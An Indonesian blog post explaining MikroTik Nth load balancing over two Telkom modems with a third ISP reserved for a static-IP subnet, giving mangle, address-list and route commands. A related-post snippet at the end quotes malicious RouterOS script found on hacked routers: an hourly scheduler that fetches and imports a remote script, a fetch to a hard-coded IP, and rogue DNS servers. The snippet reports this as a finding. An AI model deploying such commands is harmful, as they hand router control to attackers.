Langsung ke konten utama

Troubleshoot : Load Balancing Mikrotik - Nth (2 WAN balancing - 1 WAN direct - with 2 LAN Subnet)

cctv online mojokerto,cctv mojokerto mojokerto cctv mojokerto jawa timur,live cctv mojokerto,

email : ariyaandro@gmail.com

 

sumber : https://forum.peplink.com/t/deploying-the-peplink-balance-in-drop-in-mode/8030

Post ini ditujukan bagi yang sudah mengerti jaringan mikrotik pernah setting basic seperti DHCP server dan pembagian bandwidth secara merata menggunakan mirkotik. Post ini akan fokus langsung ke mangle dan routing…

Posting ini akan membahas sedikit hal teknis tentang permasalahan judul di atas. Berawal dari kebutuhan dan beberapa posting blog lainnya juga, maka ingin memperjelas sedikit temuan masalahnya. Yang dengan skenario brikut dan temuan di internet umumnya ternyata dalam awal load balancing yang berjalan dilanjut penambahan dan pemisahan jalur jadinya terjadi berikut :

  1. 2 modem indiehome tergabung dalam satu mikrotik
  2. 2 modem di atas di mode kan load balancing
  3. Metode balancing dengan Nth
  4. Semua jalur LAN hanya melalui satu port mikrotik saja
  5. Dilanjut penambahan 1 modem ISP lainnya yang dipruntukan kebutuhan khusus

Maka lanjut salah satu opsi yang di ambil,

  1. Port LAN di modekan DHCP server
  2. Sedangkan untuk kebutuhan khusus di modekan jalur ip static koneksi LAN nya

nah akhirnya masalah yang timbul dari skenario di atas adalah disaat dimana kebutuhan terbaru yaitu point 5 “penambahan 1 modem ISP lainnya yang dipruntukan kebutuhan khusus“. dari beberapa tutorial hasil pencarian di internet dengan kata kunci “memisahkan 3 lan dengan 3 isp” maka terlihat dari beberapa tutorial hampir sama semua tekniknya walau tak sama persis dengan skenario. namun dari segi teori dari beberapa artikel tersebut terlihat baik2 saja dan sesuai teori baik yang menggunakan metode prerouting atau input-output dalam pengaturan mangle nya.

ternyata permasalahnya dilapangan (yang didapat dari salah satu artikel, maaf tak sempat untuk save) masih kurang sesuai yang diinginkan. ada sedikit perbedaan dari lainnya yaitu penggunaan Passthrough di metode prerouting, yang tentunya untuk kases skenario di atas ini ternyata memfungsikan pembagian dan pengalihan dalam mengarahkan koneksi routing dari ip tertentu (kebutuhan khusus) ke ISP yang di inginkan sebelum koneksi tersebut terpilah oleh mangle load balancing Nth.

ok berikut gambaran topologi dari skenario di atas :

Drawing1

keterangan gambar :
di asumsikan ether1 untuk telkom1 (ip : 192.168.100.0/24)
ether2 untuk telkom2 (ip : 192.168.200.0/24)
ether3 untuk ISP3 (ip : ip-public-static/30)
ether4 untuk jalur local (ip : 192.168.1.0/24)

SESI 1

pada mulanya menggunakan load balancing 2 modem telkom (belum ada ISP ke 3) dengan mangle untuk memisahkan jalur ke dua modem seperti berikut :

buat list address terlebih dahulu sesuai kebutuhan

/ip firewall address-listadd address=172.16.1.0/24 list=Serveradd address=10.0.0.0/24 list=Server

lalu filter koneksi untuk pemisahan ke dua modem, dengan ketentuan selain list server akan di anggap koneksi yang akan ke modem

/ip firewall mangleadd action=mark-connection chain=prerouting comment=\ "LB-Nth__________ kecuali menuju server list" connection-state=new \ dst-address-list=!Server in-interface=ether4 new-connection-mark=satu \ nth=2,1 passthrough=yesadd action=mark-routing chain=prerouting connection-mark=satu \ dst-address-list=!Server in-interface=ether4 new-routing-mark=na_WAN1 \ passthrough=noadd action=mark-connection chain=prerouting connection-state=new \ dst-address-list=!Server in-interface=ether4 new-connection-mark=dua \ nth=1,1 passthrough=yesadd action=mark-routing chain=prerouting connection-mark=dua \ dst-address-list=!Server in-interface=ether4 new-routing-mark=na_WAN2 \ passthrough=no

dilanjut dengan penentuan mangle masuk ke modem mana saja

/ip routeadd comment=LB-Nth distance=1 gateway=192.168.100.1 routing-mark=na_WAN1add distance=1 gateway=192.168.200.1 routing-mark=na_WAN2add check-gateway=ping comment=utama distance=1 gateway=192.168.100.1add check-gateway=ping comment=cadangan distance=2 gateway=192.168.200.1

seharusnya sampai disini potongan script utama sudah bisa menjalankan load balancing dijaringan local

SESI 2

ada penambahan ISP ke 3 dan diperuntukan bagi yang menggunakan menggunakan ip static, agar terpisah dari jalur local yang ada yaitu 192.168.1.0/24. namun berhubung setting mangle sebelumnya diperuntukkan selain list serve maka akan kena mangle load balancing maka dicoba disiati pembuatan mangle lagi untuk ip static tersendiri yaitu 192.168.11.0/24 agar dilewatkan saja jalur internetnya ke ISP3. maka dicobakan script berikut

buat list address kembali ini local static

/ip firewall address-listadd address=192.168.11.0/24 list=Khusus-Hyper

penambahan mangle, namun letakkan pada urutan sebelum mangle load balancing

/ip firewall mangleadd action=mark-connection chain=prerouting \connection-state=new in-interface=ether4 \new-connection-mark=conn_hyper passthrough=yes src-address-list=\Khusus-Hyper add action=mark-routing chain=prerouting connection-mark=conn_hyper \new-routing-mark=to_hyper passthrough=no src-address-list=Khusus-Hyper

penambahan routing, ditandai dengan distance ke 3 saja seperti berikut

/ip routeadd comment=cadangan-hyper disabled=yes distance=3 gateway=113.110.12.57 \routing-mark=to_hyper

secara lapangan waktu dicobakan jalan ip static memperoleh jalur ke ISP3 dan berhasil dipisah dengan kedua modem telkom.

bila terjadi problem

coba rubah distance jalur telkom pada tabel routing di beri angka 2 dan ISP3 sebagai utama dengan memberi angka distance 1.

jika bermasalah kembali, ini temuan yang belum tercoba ( mungkin klo sempat coba hasilnya akan di ubdate ) yaitu dengan cara mangle untuk memisahkan jalur ke ISP 3 itu disable saja dan routing tabel menjadi 2 modem telkom distance 2 dan ISP3 dengan distance 1 non routing mark (kosongi)

selebihnya silahkan komen, bila ada kurangnya mohon maaf dan selebihnya diusahakan akan direvisi posting ini agar lebih relevan dan tepat sasaran…

maaf bila ada salah kata maupun istilah, silahkan memberi masukan.
salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

cctv online mojokerto,cctv mojokerto mojokerto cctv mojokerto jawa timur,live cctv mojokerto,

email : ariyaandro@gmail.com

Label:

Komentar

Posting Komentar

Postingan populer dari blog ini

Mikrotik : Wabah November 2018

email : ariyaandro@ gmail.com post yang lalu yaitu : Mikrotik : Serangan Hajime Botnet ke seluruh mikrotik dunia Mikrotik : Wabah september 2018 Mikrotik : Wabah Oktober 2018 update temuan script hacked yang baru lagi,…   /system scheduler add interval=1h name=updateSZJS on-event=":do {/tool fetch url=\"http://meag\ han. pythonanywhere.com /\" dst-path=tmp} on-error={:put \"get http error\"}\ ;\r\ \n/import tmp;\r\ \n/file remove tmp;" policy=\ ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\ mar/31/2018 start-time=20:21:00 /system script add name=script4_ owner=xxx policy=\ ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\ ddress= 95.154.216.168 port=2008 src-path=/mikrotik.php mode=http keep-resu\ lt=no"   /ip dns set allow-remote-requests=yes servers=" 94.247.43.254,1\ 07.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141 " /ip firewall nat add action=redirect chain=dstnat comme...
Posting Komentar
Read more »

Troubleshoot : Cek dan Menurunkan Beban CPU Mikrotik karena SPI Service

email : ariyaandro@gmail.com POSTING 813 kapan lalu mimin mengalami kendala jaringan yang sedikit melemah dan ternyata ada gangguan load CPU pada mikrotik seri 2011UiAS-2HnD, lanjut gunakan tutorial berikut untuk menemukan dugaan yang ada Cara Mengetahui Proses yang Menyebabkan CPU Usage Tinggi di Mikrotik akhirnya terpantau CPU tinggi walau kondisi idle di luar jam kerja di beberapa minggu trakhir dengan rerata CPU load hampir 50 %, pertama untuk meastikan disable atau hapus rule yang tak terlalu wajib utk sementara. namun kendala CPU load cukup tinggi, dugaan rentang sekitar 2 minggu trakhir ada update OS itu yang mengakibatkan ada bug yang berimbas ke service SPI. dikarenakan router yang sama di lokasi berbeda dengan OS update yang sama dengan rule yang hampir sama jumlah aktifnya tidak mengalami load cukup tinggi. Cara Memperkecil Load CPU Mikrotik hasil pengecekan tool-profile ternyata service SPI yang sedang bermasalah memakan resource cukup tinggi dan merepotkan traffic jaringan...
Posting Komentar
Read more »

Troubleshoot : intel management engine interface - shutdown problem - can't power off

email : ariyaandro@gmail.com POSTING 797 beberapa waktu lalu mimin ada sedikit problem yang menggangu yaitu ketika PC melakukan proses shutdown selesai, power PC tidak bisa langsung off sempurna (diakhir proses shutdown hanya dim warna hitam saja pada layar) harus dimatikan paksa. namun dengan solusi berikut syukurlah membantu kembali lancar shutdown dengan baik. spek yang sedang digunakan PC yang problem ini yaitu menggunakan Windows 10 Pro 64 bit. setelah mencari artikel yang sesuai berikut https://forums.tomshardware.com/faq/fix-intel-registered-management-engine-interface-has-a-driver-problem.3274586/ https://tencomputer.com/intel-management-engine-interface-driver/ https://www.drivereasy.com/knowledge/intel-r-management-engine-interface-this-device-cannot-start-on-windows-solved/ https://community.spiceworks.com/topic/2095008-remove-intel-management-engine kesimpulan , ada kemungkinan masalah driver yaitu intel management engine interface. maka dilakukan rekomendasi uninstall driv...
Posting Komentar
Read more »